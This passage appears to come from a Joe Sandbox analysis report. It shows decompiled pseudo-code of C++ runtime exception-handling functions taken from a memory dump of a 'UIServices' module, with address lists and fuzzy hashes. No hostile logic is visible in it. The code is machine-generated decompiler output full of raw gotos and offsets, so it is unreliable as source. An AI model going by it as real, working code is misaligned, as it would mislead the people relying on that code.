                                                    				E00007FFC7FFC23C67078(_t229, _t377 - 0x39, _t377 - 0x29, _t301);
                                                    				_t230 =  *0x23c74370; // 0x0
                                                    				if (( !(_t230 >> 0x13) & 0x00000001) == 0) goto 0x23c6a897;
                                                    				E00007FFC7FFC23C6BA80(_t225 & r14d |  *(_t294 + 8) & 0x000000ff,  !(_t230 >> 0x13), _t245, _t301, _t377 + 0x27, _t370, _t374);
                                                    				E00007FFC7FFC23C67078( !(_t230 >> 0x13), _t377 - 0x39, _t294, _t301);
                                                    				goto 0x23c6a8b7;
                                                    				E00007FFC7FFC23C6BA80(_t225 & r14d |  *(_t294 + 8) & 0x000000ff,  !(_t230 >> 0x13), _t245, _t301, _t377 - 0x39, _t370, _t374);
                                                    				if ( *(_t377 - 0x31) == 3) goto 0x23c6a8b7;
                                                    				if ( *(_t294 + 8) - 1 <= 0) goto 0x23c6a8b7;
                                                    				 *(_t377 - 0x31) =  *(_t377 - 0x31) & r14d |  *(_t294 + 8) & 0x000000ff;
                                                    				E00007FFC7FFC23C6AB08(_t377 + 0x27);
                                                    				E00007FFC7FFC23C67078( *(_t377 - 0x31) & r14d |  *(_t294 + 8) & 0x000000ff, _t377 - 0x39, _t294, _t301);
                                                    				_t212 =  *0x23c74370; // 0x0
                                                    				if (( !(_t212 >> 8) & 0x00000001) == 0) goto 0x23c6a911;
                                                    				E00007FFC7FFC23C6D0B0(_t377 + 0x27);
                                                    				E00007FFC7FFC23C67078( *(_t377 - 0x31) & r14d |  *(_t294 + 8) & 0x000000ff, _t377 - 0x39, _t294, _t301);
                                                    				if (_t374 == 0) goto 0x23c6a930;
                                                    				 *_t374 =  *((intOrPtr*)(_t377 - 0x39));
                                                    				 *(_t374 + 8) =  *(_t377 - 0x31);
                                                    				_t296 =  *((intOrPtr*)(_t377 + 0x17));
                                                    				 *_t370 = _t296;
                                                    				 *(_t370 + 8) =  *(_t377 + 0x1f);
                                                    				goto 0x23c6a945;
                                                    				E00007FFC7FFC23C6D0B0(_t377 - 0x39);
                                                    				if ( *(_t377 - 0x31) == 3) goto 0x23c6a8f0;
                                                    				if ( *(_t296 + 8) - 1 <= 0) goto 0x23c6a8f0;
                                                    				goto 0x23c6a8f3;
                                                    				 *(_t370 + 8) = r13d;
                                                    				 *(_t370 + 8) = 3;
                                                    				goto 0x23c6a942;
                                                    				 *(_t370 + 8) = r13d;
                                                    				 *(_t370 + 8) = 2;
                                                    				 *_t370 = _t400;
                                                    				return  *(_t296 + 8) & 0x000000ff;
                                                    			}




































                                                    0x7ffc23c6a434
                                                    0x7ffc23c6a434
                                                    0x7ffc23c6a434
                                                    0x7ffc23c6a434
                                                    0x7ffc23c6a437
                                                    0x7ffc23c6a43b
                                                    0x7ffc23c6a43f
                                                    0x7ffc23c6a44c
                                                    0x7ffc23c6a457
                                                    0x7ffc23c6a45a
                                                    0x7ffc23c6a45d
                                                    0x7ffc23c6a464
                                                    0x7ffc23c6a46a
                                                    0x7ffc23c6a473
                                                    0x7ffc23c6a477
                                                    0x7ffc23c6a47b
                                                    0x7ffc23c6a485
                                                    0x7ffc23c6a48a
                                                    0x7ffc23c6a495
                                                    0x7ffc23c6a49a
                                                    0x7ffc23c6a4a3
                                                    0x7ffc23c6a4aa
                                                    0x7ffc23c6a4ad
                                                    0x7ffc23c6a4b7
                                                    0x7ffc23c6a4bc
                                                    0x7ffc23c6a4c1
                                                    0x7ffc23c6a4c1
                                                    0x7ffc23c6a4c8
                                                    0x7ffc23c6a4d8
                                                    0x7ffc23c6a4dc
                                                    0x7ffc23c6a4e0
                                                    0x7ffc23c6a4ec
                                                    0x7ffc23c6a4f2
                                                    0x7ffc23c6a4f5
                                                    0x7ffc23c6a4fe
                                                    0x7ffc23c6a505
                                                    0x7ffc23c6a509
                                                    0x7ffc23c6a50d
                                                    0x7ffc23c6a511
                                                    0x7ffc23c6a514
                                                    0x7ffc23c6a518
                                                    0x7ffc23c6a528
                                                    0x7ffc23c6a535
                                                    0x7ffc23c6a53c
                                                    0x7ffc23c6a544
                                                    0x7ffc23c6a54c
                                                    0x7ffc23c6a551
                                                    0x7ffc23c6a561
                                                    0x7ffc23c6a56a
                                                    0x7ffc23c6a571
                                                    0x7ffc23c6a574
                                                    0x7ffc23c6a57e
                                                    0x7ffc23c6a584
                                                    0x7ffc23c6a58b
                                                    0x7ffc23c6a593
                                                    0x7ffc23c6a59a
                                                    0x7ffc23c6a5aa
                                                    0x7ffc23c6a5bb
                                                    0x7ffc23c6a5c6
                                                    0x7ffc23c6a5ca
                                                    0x7ffc23c6a5d0
                                                    0x7ffc23c6a5d4
                                                    0x7ffc23c6a5d8
                                                    0x7ffc23c6a5e0
                                                    0x7ffc23c6a5ec
                                                    0x7ffc23c6a5f7
                                                    0x7ffc23c6a5fa
                                                    0x7ffc23c6a5fc
                                                    0x7ffc23c6a5fc
                                                    0x7ffc23c6a600
                                                    0x7ffc23c6a60a
                                                    0x7ffc23c6a613
                                                    0x7ffc23c6a61c
                                                    0x7ffc23c6a620
                                                    0x7ffc23c6a627
                                                    0x7ffc23c6a62a
                                                    0x7ffc23c6a633
                                                    0x7ffc23c6a637
                                                    0x7ffc23c6a641
                                                    0x7ffc23c6a64b
                                                    0x7ffc23c6a653
                                                    0x7ffc23c6a65b
                                                    0x7ffc23c6a660
                                                    0x7ffc23c6a664
                                                    0x7ffc23c6a66b
                                                    0x7ffc23c6a66e
                                                    0x7ffc23c6a678
                                                    0x7ffc23c6a67e
                                                    0x7ffc23c6a68e
                                                    0x7ffc23c6a694
                                                    0x7ffc23c6a69b
                                                    0x7ffc23c6a6a3
                                                    0x7ffc23c6a6a7
                                                    0x7ffc23c6a6aa
                                                    0x7ffc23c6a6ba
                                                    0x7ffc23c6a6cb
                                                    0x7ffc23c6a6d6
                                                    0x7ffc23c6a6da
                                                    0x7ffc23c6a6e0
                                                    0x7ffc23c6a6e8
                                                    0x7ffc23c6a6f0
                                                    0x7ffc23c6a6f9
                                                    0x7ffc23c6a703
                                                    0x7ffc23c6a708
                                                    0x7ffc23c6a710
                                                    0x7ffc23c6a718
                                                    0x7ffc23c6a71d
                                                    0x7ffc23c6a726
                                                    0x7ffc23c6a72c
                                                    0x7ffc23c6a735
                                                    0x7ffc23c6a737
                                                    0x7ffc23c6a73a
                                                    0x7ffc23c6a74a
                                                    0x7ffc23c6a74c
                                                    0x7ffc23c6a75c
                                                    0x7ffc23c6a767
                                                    0x7ffc23c6a76b
                                                    0x7ffc23c6a76e
                                                    0x7ffc23c6a770
                                                    0x7ffc23c6a779
                                                    0x7ffc23c6a77f
                                                    0x7ffc23c6a78a
                                                    0x7ffc23c6a790
                                                    0x7ffc23c6a794
                                                    0x7ffc23c6a79c
                                                    0x7ffc23c6a7a0
                                                    0x7ffc23c6a7b1
                                                    0x7ffc23c6a7b6
                                                    0x7ffc23c6a7c1
                                                    0x7ffc23c6a7cc
                                                    0x7ffc23c6a7d0
                                                    0x7ffc23c6a7df
                                                    0x7ffc23c6a7ea
                                                    0x7ffc23c6a7ec
                                                    0x7ffc23c6a7ef
                                                    0x7ffc23c6a7f3
                                                    0x7ffc23c6a7f5
                                                    0x7ffc23c6a7ff
                                                    0x7ffc23c6a808
                                                    0x7ffc23c6a80f
                                                    0x7ffc23c6a817
                                                    0x7ffc23c6a81b
                                                    0x7ffc23c6a81e
                                                    0x7ffc23c6a82e
                                                    0x7ffc23c6a833
                                                    0x7ffc23c6a83e
                                                    0x7ffc23c6a84a
                                                    0x7ffc23c6a84f
                                                    0x7ffc23c6a85c
                                                    0x7ffc23c6a861
                                                    0x7ffc23c6a86b
                                                    0x7ffc23c6a870
                                                    0x7ffc23c6a882
                                                    0x7ffc23c6a884
                                                    0x7ffc23c6a890
                                                    0x7ffc23c6a895
                                                    0x7ffc23c6a897
                                                    0x7ffc23c6a8a0
                                                    0x7ffc23c6a8a6
                                                    0x7ffc23c6a8b4
                                                    0x7ffc23c6a8bb
                                                    0x7ffc23c6a8c7
                                                    0x7ffc23c6a8cc
                                                    0x7ffc23c6a8dd
                                                    0x7ffc23c6a8df
                                                    0x7ffc23c6a8eb
                                                    0x7ffc23c6a8f6
                                                    0x7ffc23c6a8fc
                                                    0x7ffc23c6a8ff
                                                    0x7ffc23c6a902
                                                    0x7ffc23c6a906
                                                    0x7ffc23c6a90c
                                                    0x7ffc23c6a90f
                                                    0x7ffc23c6a911
                                                    0x7ffc23c6a91a
                                                    0x7ffc23c6a920
                                                    0x7ffc23c6a92e
                                                    0x7ffc23c6a930
                                                    0x7ffc23c6a934
                                                    0x7ffc23c6a938
                                                    0x7ffc23c6a93a
                                                    0x7ffc23c6a93e
                                                    0x7ffc23c6a942
                                                    0x7ffc23c6a968

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002F.00000002.404539781.00007FFC23C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFC23C60000, based on PE: true
                                                    • Associated: 0000002F.00000002.404521676.00007FFC23C60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404566101.00007FFC23C70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404586308.00007FFC23C74000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404607794.00007FFC23C75000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404624421.00007FFC23C77000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_47_2_7ffc23c60000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: Name::operator+
                                                    • String ID:
                                                    • API String ID: 2943138195-0
                                                    • Opcode ID: ad86b220bfcdb31b6b2c81dea97df1f76549295fa32da24b22303f0250981423
                                                    • Instruction ID: e4907965d3b7b1b8ef0c291d84f54bbdc1e6086bcbfeed3b2cd2ec96bd690fb1
                                                    • Opcode Fuzzy Hash: ad86b220bfcdb31b6b2c81dea97df1f76549295fa32da24b22303f0250981423
                                                    • Instruction Fuzzy Hash: BFF1AE76F08AAA9AE700DF68E8901FC37B0EB8434CB404275DA4D67B99DF38D555CB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 56%
                                                    			E00007FFC7FFC23C62A44(intOrPtr __ecx, intOrPtr* __rcx, long long __rdx, long long __r8, long long __r9) {
                                                    				void* __rbx;
                                                    				void* __rdi;
                                                    				void* __rsi;
                                                    				void* __rbp;
                                                    				signed long long _t136;
                                                    				void* _t153;
                                                    				intOrPtr _t154;
                                                    				intOrPtr _t161;
                                                    				intOrPtr _t185;
                                                    				signed int _t186;
                                                    				signed int _t187;
                                                    				void* _t189;
                                                    				intOrPtr _t219;
                                                    				signed long long _t229;
                                                    				long long _t231;
                                                    				unsigned long long _t237;
                                                    				long long _t239;
                                                    				signed long long _t244;
                                                    				void* _t245;
                                                    				signed int _t247;
                                                    				intOrPtr* _t248;
                                                    				long long _t249;
                                                    				long long _t281;
                                                    				signed long long _t293;
                                                    				long long _t294;
                                                    				void* _t295;
                                                    				void* _t296;
                                                    				signed long long _t297;
                                                    				long long _t309;
                                                    				void* _t316;
                                                    				signed long long _t319;
                                                    
                                                    				_t295 = _t296 - 0x28;
                                                    				_t297 = _t296 - 0x128;
                                                    				_t229 =  *0x23c74038; // 0x577607bbd382
                                                    				 *(_t295 + 0x10) = _t229 ^ _t297;
                                                    				_t231 =  *((intOrPtr*)(_t295 + 0xa8));
                                                    				_t293 =  *((intOrPtr*)(_t295 + 0x90));
                                                    				 *((long long*)(_t297 + 0x68)) = __r8;
                                                    				_t248 = __rcx;
                                                    				 *((long long*)(_t295 - 0x80)) = __rdx;
                                                    				r13b = 0;
                                                    				 *((long long*)(_t295 - 0x78)) = _t231;
                                                    				 *((char*)(_t297 + 0x61)) = 0;
                                                    				 *((intOrPtr*)(_t297 + 0x60)) = r13b;
                                                    				_t294 = __r9;
                                                    				_t136 = E00007FFC7FFC23C64DB0(__rcx, __rdx, __r9, __r9, _t295, _t293);
                                                    				r14d = _t136;
                                                    				if (_t136 - 0xffffffff < 0) goto 0x23c62edf;
                                                    				if (_t136 -  *((intOrPtr*)(_t293 + 4)) >= 0) goto 0x23c62edf;
                                                    				if ( *_t248 != 0xe06d7363) goto 0x23c62b99;
                                                    				if ( *((intOrPtr*)(_t248 + 0x18)) != 4) goto 0x23c62b99;
                                                    				if ( *((intOrPtr*)(_t248 + 0x20)) - 0x19930520 - 2 > 0) goto 0x23c62b99;
                                                    				if ( *((long long*)(_t248 + 0x30)) != 0) goto 0x23c62b99;
                                                    				E00007FFC7FFC23C664B0(_t231);
                                                    				if ( *((long long*)(_t231 + 0x20)) == 0) goto 0x23c62ee6;
                                                    				E00007FFC7FFC23C664B0(_t231);
                                                    				_t249 =  *((intOrPtr*)(_t231 + 0x20));
                                                    				E00007FFC7FFC23C664B0(_t231);
                                                    				 *((char*)(_t297 + 0x61)) = 1;
                                                    				 *((long long*)(_t297 + 0x68)) =  *((intOrPtr*)(_t231 + 0x28));
                                                    				E00007FFC7FFC23C6F084(_t231,  *((intOrPtr*)(_t249 + 0x38)));
                                                    				if ( *_t249 != 0xe06d7363) goto 0x23c62b4f;
                                                    				if ( *((intOrPtr*)(_t249 + 0x18)) != 4) goto 0x23c62b4f;
                                                    				if ( *((intOrPtr*)(_t249 + 0x20)) - 0x19930520 - 2 > 0) goto 0x23c62b4f;
                                                    				if ( *((long long*)(_t249 + 0x30)) == 0) goto 0x23c62edf;
                                                    				E00007FFC7FFC23C664B0(_t231);
                                                    				if ( *(_t231 + 0x38) == 0) goto 0x23c62b99;
                                                    				E00007FFC7FFC23C664B0(_t231);
                                                    				E00007FFC7FFC23C664B0(_t231);
                                                    				 *(_t231 + 0x38) =  *(_t231 + 0x38) & 0x00000000;
                                                    				if (E00007FFC7FFC23C64E48(_t231, _t249, _t249,  *(_t231 + 0x38), _t294) != 0) goto 0x23c62b94;
                                                    				if (E00007FFC7FFC23C64F38(_t231, _t249,  *(_t231 + 0x38), _t294, _t295) != 0) goto 0x23c62f06;
                                                    				__imp__terminate();
                                                    				asm("int3");
                                                    				 *((long long*)(_t295 - 0x40)) =  *((intOrPtr*)(_t294 + 8));
                                                    				 *(_t295 - 0x48) = _t293;
                                                    				if ( *_t249 != 0xe06d7363) goto 0x23c62e96;
                                                    				if ( *((intOrPtr*)(_t249 + 0x18)) != 4) goto 0x23c62e96;
                                                    				if ( *((intOrPtr*)(_t249 + 0x20)) - 0x19930520 - 2 > 0) goto 0x23c62e96;
                                                    				if ( *((intOrPtr*)(_t293 + 0xc)) <= 0) goto 0x23c62dac;
                                                    				 *(_t297 + 0x28) =  *(_t295 + 0xa0);
                                                    				 *(_t297 + 0x20) = _t293;
                                                    				r8d = r14d;
                                                    				_t153 = E00007FFC7FFC23C6E928(_t249, _t295 - 0x28, _t295 - 0x48, _t294, _t295, _t294, _t316);
                                                    				asm("movups xmm0, [ebp-0x28]");
                                                    				asm("movdqu [ebp-0x38], xmm0");
                                                    				asm("psrldq xmm0, 0x8");
                                                    				asm("movd eax, xmm0");
                                                    				if (_t153 -  *((intOrPtr*)(_t295 - 0x10)) >= 0) goto 0x23c62dac;
                                                    				_t309 =  *((intOrPtr*)(_t295 - 0x28));
                                                    				r12d =  *((intOrPtr*)(_t295 - 0x30));
                                                    				 *((long long*)(_t297 + 0x78)) = _t309;
                                                    				_t154 = r12d;
                                                    				asm("inc ecx");
                                                    				 *((intOrPtr*)(_t295 - 0x50)) = __ecx;
                                                    				asm("movd eax, xmm0");
                                                    				asm("movups [ebp-0x60], xmm0");
                                                    				if (_t154 - r14d > 0) goto 0x23c62d92;
                                                    				_t237 =  *(_t295 - 0x60) >> 0x20;
                                                    				if (r14d - _t154 > 0) goto 0x23c62d92;
                                                    				_t281 =  *((intOrPtr*)( *((intOrPtr*)( *( *(_t295 - 0x38)) + 0x10)) + ( *( *(_t295 - 0x38)) +  *( *(_t295 - 0x38)) * 4) * 4 +  *((intOrPtr*)(_t309 + 8)) + 0x10)) +  *((intOrPtr*)(_t294 + 8));
                                                    				r13d = 0;
                                                    				 *((long long*)(_t295 - 0x68)) = _t281;
                                                    				if (r15d == 0) goto 0x23c62d8d;
                                                    				asm("movups xmm0, [edx+ecx*4]");
                                                    				asm("movups [ebp-0x8], xmm0");
                                                    				 *((intOrPtr*)(_t295 + 8)) =  *((intOrPtr*)(_t281 + 0x10 + (_t319 * 4 + _t319) * 4));
                                                    				E00007FFC7FFC23C6F058(_t237);
                                                    				_t239 = _t237 + 4 +  *((intOrPtr*)( *((intOrPtr*)(_t249 + 0x30)) + 0xc));
                                                    				 *((long long*)(_t297 + 0x70)) = _t239;
                                                    				E00007FFC7FFC23C6F058(_t239);
                                                    				_t185 =  *((intOrPtr*)(_t239 +  *((intOrPtr*)( *((intOrPtr*)(_t249 + 0x30)) + 0xc))));
                                                    				 *((intOrPtr*)(_t297 + 0x64)) = _t185;
                                                    				if (_t185 <= 0) goto 0x23c62d0f;
                                                    				E00007FFC7FFC23C6F058(_t239);
                                                    				 *((long long*)(_t295 - 0x70)) = _t239 +  *((intOrPtr*)( *((intOrPtr*)(_t297 + 0x70))));
                                                    				if (E00007FFC7FFC23C63938(_t189, _t249, _t295 - 8, _t239 +  *((intOrPtr*)( *((intOrPtr*)(_t297 + 0x70)))), _t293, _t294,  *((intOrPtr*)(_t249 + 0x30))) != 0) goto 0x23c62d20;
                                                    				 *((long long*)(_t297 + 0x70)) =  *((long long*)(_t297 + 0x70)) + 4;
                                                    				_t161 =  *((intOrPtr*)(_t297 + 0x64)) - 1;
                                                    				 *((intOrPtr*)(_t297 + 0x64)) = _t161;
                                                    				if (_t161 > 0) goto 0x23c62cd3;
                                                    				r13d = r13d + 1;
                                                    				if (r13d == r15d) goto 0x23c62d88;
                                                    				goto 0x23c62c88;
                                                    				r13b = 1;
                                                    				 *((char*)(_t297 + 0x58)) =  *((intOrPtr*)(_t295 + 0x98));
                                                    				 *(_t297 + 0x50) =  *((intOrPtr*)(_t297 + 0x61));
                                                    				 *((long long*)(_t297 + 0x48)) =  *((intOrPtr*)(_t295 - 0x78));
                                                    				 *(_t297 + 0x40) =  *(_t295 + 0xa0);
                                                    				 *(_t297 + 0x38) = _t295 - 0x60;
                                                    				 *(_t297 + 0x30) =  *((intOrPtr*)(_t295 - 0x70));
                                                    				_t244 = _t295 - 8;
                                                    				 *(_t297 + 0x28) = _t244;
                                                    				 *(_t297 + 0x20) = _t293;
                                                    				 *((intOrPtr*)(_t297 + 0x60)) = r13b;
                                                    				E00007FFC7FFC23C6289C(_t185, _t249, _t249,  *((intOrPtr*)(_t295 - 0x80)),  *((intOrPtr*)(_t297 + 0x68)), _t294);
                                                    				goto 0x23c62d92;
                                                    				r13b =  *((intOrPtr*)(_t297 + 0x60));
                                                    				r12d = r12d + 1;
                                                    				if (r12d -  *((intOrPtr*)(_t295 - 0x10)) < 0) goto 0x23c62c20;
                                                    				if (r13b != 0) goto 0x23c62ed3;
                                                    				if (( *_t293 & 0x1fffffff) - 0x19930521 < 0) goto 0x23c62ed3;
                                                    				_t219 =  *((intOrPtr*)(_t293 + 0x20));
                                                    				if (_t219 == 0) goto 0x23c62dd2;
                                                    				E00007FFC7FFC23C6F044(_t244);
                                                    				_t245 = _t244 +  *((intOrPtr*)(_t293 + 0x20));
                                                    				if (_t219 != 0) goto 0x23c62df3;
                                                    				if (( *(_t293 + 0x24) >> 0x00000002 & 0x00000001) == 0) goto 0x23c62ed3;
                                                    				if (E00007FFC7FFC23C6E76C(_t185,  *(_t293 + 0x24) >> 0x00000002 & 0x00000001, _t245, _t294, _t293, _t294,  *((intOrPtr*)(_t297 + 0x78))) != 0) goto 0x23c62ed3;
                                                    				if (( *(_t293 + 0x24) >> 0x00000002 & 0x00000001) == 0) goto 0x23c62e1b;
                                                    				E00007FFC7FFC23C664B0(_t245);
                                                    				 *((long long*)(_t245 + 0x20)) = _t249;
                                                    				E00007FFC7FFC23C664B0(_t245);
                                                    				 *((long long*)(_t245 + 0x28)) =  *((intOrPtr*)(_t297 + 0x68));
                                                    				__imp__terminate();
                                                    				asm("int3");
                                                    				if ( *((intOrPtr*)(_t293 + 0x20)) == 0) goto 0x23c62e32;
                                                    				E00007FFC7FFC23C6F044(_t245);
                                                    				goto 0x23c62e34;
                                                    				if (E00007FFC7FFC23C64E48( *((intOrPtr*)(_t293 + 0x20)), _t249, _t249, _t245 +  *((intOrPtr*)(_t293 + 0x20)), _t294) != 0) goto 0x23c62ed3;
                                                    				E00007FFC7FFC23C6E838(_t185, _t249,  *((intOrPtr*)(_t295 - 0x80)), _t294, _t295, _t293, _t295 - 0x70);
                                                    				_t186 =  *((intOrPtr*)(_t295 + 0x98));
                                                    				 *(_t297 + 0x50) = _t186;
                                                    				_t187 = _t186 | 0xffffffff;
                                                    				 *((long long*)(_t297 + 0x48)) = _t294;
                                                    				 *(_t297 + 0x40) =  *(_t297 + 0x40) & 0x00000000;
                                                    				 *(_t297 + 0x38) = _t187;
                                                    				 *(_t297 + 0x30) = _t187;
                                                    				 *(_t297 + 0x28) = _t293;
                                                    				 *(_t297 + 0x20) =  *(_t297 + 0x20) & 0x00000000;
                                                    				E00007FFC7FFC23C6EBC4( *((intOrPtr*)(_t295 - 0x80)), _t249,  *((intOrPtr*)(_t297 + 0x68)),  *((intOrPtr*)(_t293 + 0x20)));
                                                    				goto 0x23c62ed3;
                                                    				if ( *((intOrPtr*)(_t293 + 0xc)) <= 0) goto 0x23c62ed3;
                                                    				if ( *((intOrPtr*)(_t295 + 0x98)) != r13b) goto 0x23c62edf;
                                                    				_t247 =  *((intOrPtr*)(_t295 - 0x78));
                                                    				 *(_t297 + 0x38) = _t247;
                                                    				 *(_t297 + 0x30) =  *(_t295 + 0xa0);
                                                    				 *(_t297 + 0x28) = r14d;
                                                    				 *(_t297 + 0x20) = _t293;
                                                    				E00007FFC7FFC23C63430(_t249, _t249,  *((intOrPtr*)(_t295 - 0x80)),  *(_t295 - 0x58) >> 0x20, _t294);
                                                    				E00007FFC7FFC23C664B0(_t247);
                                                    				if ( *((long long*)(_t247 + 0x38)) == 0) goto 0x23c62ee6;
                                                    				abort();
                                                    				asm("int3");
                                                    				return E00007FFC7FFC23C6F5B0(_t187, _t247,  *(_t295 + 0x10) ^ _t297,  *((intOrPtr*)(_t295 - 0x80)));
                                                    			}


































                                                    0x7ffc23c62a51
                                                    0x7ffc23c62a56
                                                    0x7ffc23c62a5d
                                                    0x7ffc23c62a67
                                                    0x7ffc23c62a6b
                                                    0x7ffc23c62a75
                                                    0x7ffc23c62a7f
                                                    0x7ffc23c62a84
                                                    0x7ffc23c62a87
                                                    0x7ffc23c62a8b
                                                    0x7ffc23c62a91
                                                    0x7ffc23c62a98
                                                    0x7ffc23c62aa0
                                                    0x7ffc23c62aa5
                                                    0x7ffc23c62aa8
                                                    0x7ffc23c62aad
                                                    0x7ffc23c62ab3
                                                    0x7ffc23c62abc
                                                    0x7ffc23c62ac8
                                                    0x7ffc23c62ad2
                                                    0x7ffc23c62ae3
                                                    0x7ffc23c62aee
                                                    0x7ffc23c62af4
                                                    0x7ffc23c62afe
                                                    0x7ffc23c62b04
                                                    0x7ffc23c62b09
                                                    0x7ffc23c62b0d
                                                    0x7ffc23c62b16
                                                    0x7ffc23c62b1f
                                                    0x7ffc23c62b24
                                                    0x7ffc23c62b2f
                                                    0x7ffc23c62b35
                                                    0x7ffc23c62b42
                                                    0x7ffc23c62b49
                                                    0x7ffc23c62b4f
                                                    0x7ffc23c62b59
                                                    0x7ffc23c62b5b
                                                    0x7ffc23c62b64
                                                    0x7ffc23c62b6f
                                                    0x7ffc23c62b7b
                                                    0x7ffc23c62b87
                                                    0x7ffc23c62b8d
                                                    0x7ffc23c62b93
                                                    0x7ffc23c62b9d
                                                    0x7ffc23c62ba1
                                                    0x7ffc23c62bab
                                                    0x7ffc23c62bb5
                                                    0x7ffc23c62bc6
                                                    0x7ffc23c62bd0
                                                    0x7ffc23c62be0
                                                    0x7ffc23c62beb
                                                    0x7ffc23c62bf0
                                                    0x7ffc23c62bf3
                                                    0x7ffc23c62bf8
                                                    0x7ffc23c62bfc
                                                    0x7ffc23c62c01
                                                    0x7ffc23c62c06
                                                    0x7ffc23c62c0d
                                                    0x7ffc23c62c13
                                                    0x7ffc23c62c17
                                                    0x7ffc23c62c1b
                                                    0x7ffc23c62c2b
                                                    0x7ffc23c62c3a
                                                    0x7ffc23c62c44
                                                    0x7ffc23c62c47
                                                    0x7ffc23c62c4b
                                                    0x7ffc23c62c52
                                                    0x7ffc23c62c5c
                                                    0x7ffc23c62c63
                                                    0x7ffc23c62c70
                                                    0x7ffc23c62c74
                                                    0x7ffc23c62c7b
                                                    0x7ffc23c62c82
                                                    0x7ffc23c62c93
                                                    0x7ffc23c62c97
                                                    0x7ffc23c62c9f
                                                    0x7ffc23c62ca2
                                                    0x7ffc23c62cb3
                                                    0x7ffc23c62cb6
                                                    0x7ffc23c62cbb
                                                    0x7ffc23c62cc8
                                                    0x7ffc23c62ccb
                                                    0x7ffc23c62cd1
                                                    0x7ffc23c62cd3
                                                    0x7ffc23c62cee
                                                    0x7ffc23c62cf9
                                                    0x7ffc23c62cff
                                                    0x7ffc23c62d05
                                                    0x7ffc23c62d07
                                                    0x7ffc23c62d0d
                                                    0x7ffc23c62d0f
                                                    0x7ffc23c62d15
                                                    0x7ffc23c62d1b
                                                    0x7ffc23c62d26
                                                    0x7ffc23c62d38
                                                    0x7ffc23c62d40
                                                    0x7ffc23c62d48
                                                    0x7ffc23c62d53
                                                    0x7ffc23c62d5b
                                                    0x7ffc23c62d64
                                                    0x7ffc23c62d69
                                                    0x7ffc23c62d6d
                                                    0x7ffc23c62d72
                                                    0x7ffc23c62d77
                                                    0x7ffc23c62d7c
                                                    0x7ffc23c62d86
                                                    0x7ffc23c62d8d
                                                    0x7ffc23c62d92
                                                    0x7ffc23c62d99
                                                    0x7ffc23c62da2
                                                    0x7ffc23c62db8
                                                    0x7ffc23c62dbe
                                                    0x7ffc23c62dc2
                                                    0x7ffc23c62dc4
                                                    0x7ffc23c62dcd
                                                    0x7ffc23c62dd0
                                                    0x7ffc23c62dda
                                                    0x7ffc23c62ded
                                                    0x7ffc23c62dfb
                                                    0x7ffc23c62dfd
                                                    0x7ffc23c62e02
                                                    0x7ffc23c62e06
                                                    0x7ffc23c62e10
                                                    0x7ffc23c62e14
                                                    0x7ffc23c62e1a
                                                    0x7ffc23c62e1f
                                                    0x7ffc23c62e21
                                                    0x7ffc23c62e30
                                                    0x7ffc23c62e3e
                                                    0x7ffc23c62e51
                                                    0x7ffc23c62e56
                                                    0x7ffc23c62e67
                                                    0x7ffc23c62e6b
                                                    0x7ffc23c62e6e
                                                    0x7ffc23c62e73
                                                    0x7ffc23c62e79
                                                    0x7ffc23c62e7d
                                                    0x7ffc23c62e84
                                                    0x7ffc23c62e89
                                                    0x7ffc23c62e8f
                                                    0x7ffc23c62e94
                                                    0x7ffc23c62e9a
                                                    0x7ffc23c62ea3
                                                    0x7ffc23c62ea5
                                                    0x7ffc23c62eac
                                                    0x7ffc23c62ebd
                                                    0x7ffc23c62ec4
                                                    0x7ffc23c62ec9
                                                    0x7ffc23c62ece
                                                    0x7ffc23c62ed3
                                                    0x7ffc23c62edd
                                                    0x7ffc23c62edf
                                                    0x7ffc23c62ee5
                                                    0x7ffc23c62f05

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002F.00000002.404539781.00007FFC23C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFC23C60000, based on PE: true
                                                    • Associated: 0000002F.00000002.404521676.00007FFC23C60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404566101.00007FFC23C70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404586308.00007FFC23C74000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404607794.00007FFC23C75000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404624421.00007FFC23C77000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_47_2_7ffc23c60000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: Frame$BlockEstablisherHandler3::Unwindabortterminate$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                    • String ID: csm$csm$csm
                                                    • API String ID: 3436797354-393685449
                                                    • Opcode ID: 4ce3170e83371cd51e0fa65dcacfbb5ce84ccfa47a74054cac5f199e7ec26cb9
                                                    • Instruction ID: 9bfc8115fa8909b7727d346af071711af5b1e78c0817b7bfe2205d6690e08966
                                                    • Opcode Fuzzy Hash: 4ce3170e83371cd51e0fa65dcacfbb5ce84ccfa47a74054cac5f199e7ec26cb9
                                                    • Instruction Fuzzy Hash: A2E18232B18B5986EB50DF69D8403AD77A0FB89798F000275DE4D67B59CF38E490CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 70%
                                                    			E00007FFC7FFC23C6CACC(void* __edi, long long __rbx, long long* __rcx, void* __rdx, long long __rsi, void* __r8, void* __r10, void* __r11, long long _a16, long long _a24) {
                                                    				void* _v40;
                                                    				signed int _v56;
                                                    				void* _v57;
                                                    				char _v64;
                                                    				char _v72;
                                                    				char _v88;
                                                    				intOrPtr _v96;
                                                    				char _v104;
                                                    				char _v112;
                                                    				char _v120;
                                                    				void* __rdi;
                                                    				void* __r12;
